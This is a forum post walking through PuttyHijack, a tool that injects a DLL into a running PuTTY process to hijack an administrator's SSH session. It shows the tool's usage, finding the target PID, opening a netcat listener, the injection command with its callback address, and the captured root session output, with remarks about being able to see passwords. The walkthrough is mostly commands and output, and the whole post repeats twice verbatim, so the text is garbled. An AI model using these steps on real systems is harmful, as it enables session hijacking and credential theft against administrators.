-=Player=-
01.11.2008, 20:48
http://packetstormsecurity.org/filedesc/PuttyHijackV1.0.rar.html
PuttyHijack is a proof of concept tool that injects a dll into the Putty process to hijack an existing, or soon to be created, connection. This can be useful during penetration tests when a windows box that has been compromised is used to SSH/Telnet into other servers. The injected DLL installs some hooks and creates a socket for a callback connection that is then used for input/output redirection. It does not kill the current connection, and will cleanly uninject if the socket or process is stopped.
so lets see what it does? eh? so first lets setup a test server, i often use backtrack since its really easy to use and im a bit familiar with it. i will start some services to emulate a webserver. and lets say the admin wants to administer some stuff from his nice putty ssh connection.
webmaster# cd /var/www/
webmaster# ls
cgi-bin/ error/ htdocs/ icons/
webmaster#
load the nice putty hijacking tool
C:\Documents and Settings\lerie\Desktop\PuttyHijackV1.0>PuttyHijack.exe
++++++++++++++++++++++++++++++
+ Putty Terminal Hijack V1.0 +
+ Insomnia Security +
+ www.insomniasec.com +
++++++++++++++++++++++++++++++
- Usage: PuttyHijack IP PORT <pid>
get the ID (from tasklist)
C:\Documents and Settings\lerie\Desktop\PuttyHijackV1.0>tasklist
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 16 K
putty.exe 1584 Console 0 3,552 K
System 4 Console 0 36 K
smss.exe 760 Console 0 228 K
csrss.exe 832 Console 0 2,524 K
winlogon.exe 860 Console 0 1,352 K
services.exe 904 Console 0 2,044 K
now we need something to let us view the data being sent from the putty terminal to the server. load a netcat or socat connection.
C:\Documents and Settings\lerie>nc -l -p 22 -v
listening on [any] 22 ...
and then run the hijacker
C:\Documents and Settings\lerie\Desktop\PuttyHijackV1.0>PuttyHijack.exe 192.168.
1.100 22 1680
++++++++++++++++++++++++++++++
+ Putty Terminal Hijack V1.0 +
+ Insomnia Security +
+ www.insomniasec.com +
++++++++++++++++++++++++++++++
- Connect back to 192.168.1.100:22
- Injecting to PID 1680
- Opening process
- Starting remote thread
and reap the rewardds, in realtime
+ Connected..
su root
←[01;31mbt ←[01;34m~ # ←[00mcd /v ar/www/ht docs/
←[01;31mbt ←[01;34mhtdocs # ←[00mls -l
←[00mtotal 23
-rw-r--r-- 1 root root 2326 Nov 20 2004 ←[01;35mapache_pb.gif←[00m
-rw-r--r-- 1 root root 1385 Nov 20 2004 ←[01;35mapache_pb.png←[00m
-rw-r--r-- 1 root root 2410 Dec 14 2005 ←[01;35mapache_pb22.gif←[00m
-rw-r--r-- 1 root root 1502 Dec 14 2005 ←[01;35mapache_pb22.png←[00m
-rw-r--r-- 1 root root 2205 Dec 14 2005 ←[01;35mapache_pb22_ani.gif←[00m
-rw-r--r-- 1 root root 36 Jun 25 07:10 ←[00mindex.html←[00m
-rw-r--r-- 1 root root 44 Nov 20 2004 ←[00mindex.html~←[00m
-rw-r--r-- 1 root root 35 Jun 25 07:11 ←[00mindex.php←[00m
drwxr-xr-x 14 root root 656 Jul 1 2007 ←[01;34mmanual←[00m/
←[m←[01;31mbt ←[01;34mhtdocs # ←[00mwe can even see passwords...
bash: we: command not found
PuttyHijack is a proof of concept tool that injects a dll into the Putty process to hijack an existing, or soon to be created, connection. This can be useful during penetration tests when a windows box that has been compromised is used to SSH/Telnet into other servers. The injected DLL installs some hooks and creates a socket for a callback connection that is then used for input/output redirection. It does not kill the current connection, and will cleanly uninject if the socket or process is stopped.
so lets see what it does? eh? so first lets setup a test server, i often use backtrack since its really easy to use and im a bit familiar with it. i will start some services to emulate a webserver. and lets say the admin wants to administer some stuff from his nice putty ssh connection.
webmaster# cd /var/www/
webmaster# ls
cgi-bin/ error/ htdocs/ icons/
webmaster#
load the nice putty hijacking tool
C:\Documents and Settings\lerie\Desktop\PuttyHijackV1.0>PuttyHijack.exe
++++++++++++++++++++++++++++++
+ Putty Terminal Hijack V1.0 +
+ Insomnia Security +
+ www.insomniasec.com +
++++++++++++++++++++++++++++++
- Usage: PuttyHijack IP PORT <pid>
get the ID (from tasklist)
C:\Documents and Settings\lerie\Desktop\PuttyHijackV1.0>tasklist
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 16 K
putty.exe 1584 Console 0 3,552 K
System 4 Console 0 36 K
smss.exe 760 Console 0 228 K
csrss.exe 832 Console 0 2,524 K
winlogon.exe 860 Console 0 1,352 K
services.exe 904 Console 0 2,044 K
now we need something to let us view the data being sent from the putty terminal to the server. load a netcat or socat connection.
C:\Documents and Settings\lerie>nc -l -p 22 -v
listening on [any] 22 ...
and then run the hijacker
C:\Documents and Settings\lerie\Desktop\PuttyHijackV1.0>PuttyHijack.exe 192.168.
1.100 22 1680
++++++++++++++++++++++++++++++
+ Putty Terminal Hijack V1.0 +
+ Insomnia Security +
+ www.insomniasec.com +
++++++++++++++++++++++++++++++
- Connect back to 192.168.1.100:22
- Injecting to PID 1680
- Opening process
- Starting remote thread
and reap the rewardds, in realtime
+ Connected..
su root
←[01;31mbt ←[01;34m~ # ←[00mcd /v ar/www/ht docs/
←[01;31mbt ←[01;34mhtdocs # ←[00mls -l
←[00mtotal 23
-rw-r--r-- 1 root root 2326 Nov 20 2004 ←[01;35mapache_pb.gif←[00m
-rw-r--r-- 1 root root 1385 Nov 20 2004 ←[01;35mapache_pb.png←[00m
-rw-r--r-- 1 root root 2410 Dec 14 2005 ←[01;35mapache_pb22.gif←[00m
-rw-r--r-- 1 root root 1502 Dec 14 2005 ←[01;35mapache_pb22.png←[00m
-rw-r--r-- 1 root root 2205 Dec 14 2005 ←[01;35mapache_pb22_ani.gif←[00m
-rw-r--r-- 1 root root 36 Jun 25 07:10 ←[00mindex.html←[00m
-rw-r--r-- 1 root root 44 Nov 20 2004 ←[00mindex.html~←[00m
-rw-r--r-- 1 root root 35 Jun 25 07:11 ←[00mindex.php←[00m
drwxr-xr-x 14 root root 656 Jul 1 2007 ←[01;34mmanual←[00m/
←[m←[01;31mbt ←[01;34mhtdocs # ←[00mwe can even see passwords...
bash: we: command not found